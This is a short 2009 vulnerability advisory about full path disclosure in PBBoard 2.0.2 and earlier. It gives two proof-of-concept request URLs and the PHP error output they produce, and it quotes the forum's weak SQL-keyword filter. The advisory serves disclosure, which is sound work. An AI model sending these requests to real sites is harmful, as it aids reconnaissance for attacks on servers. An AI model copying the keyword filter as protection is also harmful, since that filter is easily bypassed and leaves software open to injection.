[Advisory]PBBoard <=2.0.2 Full Path Disclosure

2009-10-06T00:00:00
ID SECURITYVULNS:DOC:22564
Type securityvulns
Reporter Securityvulns
Modified 2009-10-06T00:00:00

Description

Advisory]PBBoard <=2.0.2 - Full Path Disclosure Details ======= Product: PHP <= PBBoard Security-Risk: moderated Remote-Exploit: yes Vendor-URL: http://www.pbboard.com

Credits

Discovered by: rUnViRuS site: http://www.sec-area.com

Affected Products:

test on PBBoard 2.0.2 maybe work under 2.0.2

More Details

1. Full Path Disclosure

allow attackers to gather the real path of the server side script.

Proof of concept: http://www.[xxxxx].com/path/index.php?page=new_topic&index=1&id=union

error Fatal error: Call to undefined method PowerBBLocalCommon::error() in /home/xxx/public_html/vb/common.php on line 193

code : // Check if $_GET don't value any SQL Injection foreach ($PowerBB->_GET as $sql_get) { if ((eregi("select", $sql_get)) or (eregi("union", $sql_get)) or (eregi("%", $sql_get))) { $this->error('ظ‚ظ…طھ طЁط№ظ…ظ„ظٹظ‡ ط؛ظٹط± ظ…طґط±ظ€ط№ظ‡!'); } } ================ ================ 2. Full Path Disclosure


allow attackers to gather the real path of the server side script.

Proof of concept: http://www.[xxxx].com/[path]/index.php?page=search&start=1&keyword=§ion=all&search=1

Warning: filesize() [function.filesize]: stat failed for show_msg in /home/xxxxx/public_html/vb/includes/template.class.php on line 99

Fatal error: ERROR::FILE_SIZE_IS_ZERO in /home/xxxxx/public_html/vb/includes/template.class.php on line 146


[W]orld [D]efacers [T]eam http://www.Sec-area.com